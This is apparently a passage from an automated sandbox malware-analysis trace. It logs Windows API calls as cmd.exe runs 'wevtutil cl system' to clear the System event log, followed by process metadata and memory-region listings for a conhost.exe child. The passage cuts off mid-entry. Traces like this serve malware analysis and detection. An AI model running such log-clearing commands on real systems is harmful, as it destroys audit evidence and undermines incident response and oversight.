lpData=0x2ce694*=0x9, lpcbData=0x2ce690*=0x4) returned 0x0 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x0, lpData=0x2ce694*=0x9, lpcbData=0x2ce690*=0x1000) returned 0x2 [0095.252] RegCloseKey (hKey=0x94) returned 0x0 [0095.252] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29810 [0095.252] srand (_Seed=0x5ad29810) [0095.252] GetCommandLineW () returned="/c wevtutil cl system" [0095.252] GetCommandLineW () returned="/c wevtutil cl system" [0095.252] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.252] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4559ca8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0095.252] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0095.252] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0095.252] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0095.252] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0095.252] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0095.252] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0095.252] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0095.252] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0095.252] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0095.252] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0095.252] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0095.252] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0095.253] GetEnvironmentStringsW () returned 0x4557d50* [0095.253] FreeEnvironmentStringsA (penv="A") returned 1 [0095.253] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.253] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0095.253] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0095.253] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0095.253] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0095.253] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0095.253] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0095.253] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0095.253] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0095.253] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0095.253] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf460 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.253] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf460, lpFilePart=0x2cf458 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x2cf458*="Desktop") returned 0x1d [0095.253] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0095.253] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf1e0 | out: lpFindFileData=0x2cf1e0) returned 0x45505c8 [0095.253] FindClose (in: hFindFile=0x45505c8 | out: hFindFile=0x45505c8) returned 1 [0095.253] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x2cf1e0 | out: lpFindFileData=0x2cf1e0) returned 0x45505c8 [0095.254] FindClose (in: hFindFile=0x45505c8 | out: hFindFile=0x45505c8) returned 1 [0095.254] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0095.254] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x2cf1e0 | out: lpFindFileData=0x2cf1e0) returned 0x45505c8 [0095.254] FindClose (in: hFindFile=0x45505c8 | out: hFindFile=0x45505c8) returned 1 [0095.254] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0095.254] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0095.254] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0095.254] GetEnvironmentStringsW () returned 0x4557d50* [0095.254] FreeEnvironmentStringsA (penv="=") returned 1 [0095.254] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.254] GetConsoleOutputCP () returned 0x1b5 [0095.255] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.255] GetUserDefaultLCID () returned 0x409 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf590, cchData=128 | out: lpLCData="0") returned 2 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf590, cchData=128 | out: lpLCData="0") returned 2 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf590, cchData=128 | out: lpLCData="1") returned 2 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0095.255] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0095.255] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0095.256] GetConsoleTitleW (in: lpConsoleTitle=0x455a9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.256] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0095.256] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0095.256] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0095.256] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0095.257] _wcsicmp (_String1="wevtutil", _String2=")") returned 78 [0095.257] _wcsicmp (_String1="FOR", _String2="wevtutil") returned -17 [0095.257] _wcsicmp (_String1="FOR/?", _String2="wevtutil") returned -17 [0095.257] _wcsicmp (_String1="IF", _String2="wevtutil") returned -14 [0095.257] _wcsicmp (_String1="IF/?", _String2="wevtutil") returned -14 [0095.257] _wcsicmp (_String1="REM", _String2="wevtutil") returned -5 [0095.257] _wcsicmp (_String1="REM/?", _String2="wevtutil") returned -5 [0095.258] GetConsoleTitleW (in: lpConsoleTitle=0x2cf278, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.258] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0095.259] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0095.259] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0095.259] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0095.259] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0095.259] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0095.259] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0095.259] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0095.259] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0095.259] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0095.259] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0095.259] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0095.259] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0095.259] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0095.259] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0095.259] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0095.259] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0095.259] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0095.259] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0095.259] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0095.259] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0095.259] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0095.259] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0095.259] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0095.259] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0095.259] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0095.259] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0095.259] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0095.259] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0095.259] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0095.259] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0095.259] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0095.259] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0095.259] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0095.259] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0095.259] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0095.259] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0095.259] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0095.259] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0095.259] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0095.259] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0095.259] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0095.259] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0095.260] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0095.260] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0095.260] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0095.260] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0095.260] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0095.260] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0095.260] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0095.260] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0095.260] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0095.260] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0095.260] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0095.260] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0095.260] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0095.260] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0095.260] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0095.260] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0095.260] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0095.260] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0095.260] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0095.260] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0095.260] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0095.260] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0095.260] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0095.260] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0095.260] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0095.260] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0095.260] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0095.260] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0095.260] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0095.260] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0095.260] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0095.260] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0095.260] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0095.260] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0095.260] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0095.260] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0095.260] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0095.260] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0095.260] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0095.260] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0095.261] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0095.261] _wcsicmp (_String1="wevtutil", _String2="FOR") returned 17 [0095.261] _wcsicmp (_String1="wevtutil", _String2="IF") returned 14 [0095.261] _wcsicmp (_String1="wevtutil", _String2="REM") returned 5 [0095.261] _wcsnicmp (_String1="wevt", _String2="cmd ", _MaxCount=0x4) returned 20 [0095.261] SetErrorMode (uMode=0x0) returned 0x0 [0095.261] SetErrorMode (uMode=0x1) returned 0x0 [0095.261] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x455aef0, lpFilePart=0x2ced84 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x2ced84*="Desktop") returned 0x1d [0095.261] SetErrorMode (uMode=0x0) returned 0x1 [0095.262] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0095.262] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0095.268] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0095.270] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.270] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x2ceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb10) returned 0xffffffff [0095.270] GetLastError () returned 0x2 [0095.270] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.270] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x2ceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb10) returned 0xffffffff [0095.271] GetLastError () returned 0x2 [0095.271] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.271] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x2ceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb10) returned 0x455b290 [0095.271] FindClose (in: hFindFile=0x455b290 | out: hFindFile=0x455b290) returned 1 [0095.271] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb10) returned 0xffffffff [0095.271] GetLastError () returned 0x2 [0095.271] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceb10) returned 0x455b290 [0095.271] FindClose (in: hFindFile=0x455b290 | out: hFindFile=0x455b290) returned 1 [0095.272] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0095.272] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0095.272] GetConsoleTitleW (in: lpConsoleTitle=0x2cf004, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.272] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cef30, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cef14 | out: lpAttributeList=0x2cef30, lpSize=0x2cef14) returned 1 [0095.272] UpdateProcThreadAttribute (in: lpAttributeList=0x2cef30, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cef1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cef30, lpPreviousValue=0x0) returned 1 [0095.272] GetStartupInfoW (in: lpStartupInfo=0x2cef68 | out: lpStartupInfo=0x2cef68*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0095.272] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0095.273] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0095.273] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0095.274] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil cl system", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x2ceeb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil cl system", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cef04 | out: lpCommandLine="wevtutil cl system", lpProcessInformation=0x2cef04*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xbd8, dwThreadId=0x488)) returned 1 [0095.417] CloseHandle (hObject=0xa4) returned 1 [0095.417] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0095.417] GetEnvironmentStringsW () returned 0x4559eb8* [0095.417] FreeEnvironmentStringsA (penv="=") returned 1 [0095.417] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0095.479] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x2cee9c | out: lpExitCode=0x2cee9c*=0x0) returned 1 [0095.480] CloseHandle (hObject=0xa8) returned 1 [0095.480] _vsnwprintf (in: _Buffer=0x2cef84, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ceea4 | out: _Buffer="00000000") returned 8 [0095.480] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0095.480] GetEnvironmentStringsW () returned 0x4557d50* [0095.480] FreeEnvironmentStringsA (penv="=") returned 1 [0095.480] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0095.480] GetEnvironmentStringsW () returned 0x4557d50* [0095.480] FreeEnvironmentStringsA (penv="=") returned 1 [0095.480] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cef30 | out: lpAttributeList=0x2cef30) [0095.480] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.480] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0095.481] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.481] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0095.481] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.481] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0095.481] SetConsoleInputExeNameW () returned 0x1 [0095.481] GetConsoleOutputCP () returned 0x1b5 [0095.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.481] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.482] exit (_Code=0) Thread: id = 30 os_tid = 0x300 Process: id = "12" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6595c000" os_pid = "0x554" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xb2c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 592 start_va = 0x7f4b7000 end_va = 0x7f4b7fff entry_point = 0x0 region_type = private name = "private_0x000000007f4b7000" filename = "" Region: id = 593 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 594 start_va = 0xbb281f0000 end_va = 0xbb2820ffff entry_point = 0x0 region_type = private name = "private_0x000000bb281f0000" filename = "" Region: id = 595 start_va = 0xbb28210000 end_va = 0xbb28223fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bb28210000" filename = "" Region: id = 596 start_va = 0xbb28230000 end_va = 0xbb2826ffff entry_point = 0x0 region_type = private name = "private_0x000000bb28230000" filename = "" Region: id = 597 start_va = 0x7df5ff090000 end_va = 0x7ff5ff08ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff090000" filename = "" Region: id = 598 start_va = 0x7ff6c3f40000 end_va = 0x7ff6c3f62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f40000" filename = "" Region: id = 599 start_va = 0x7ff6c3f6d000 end_va = 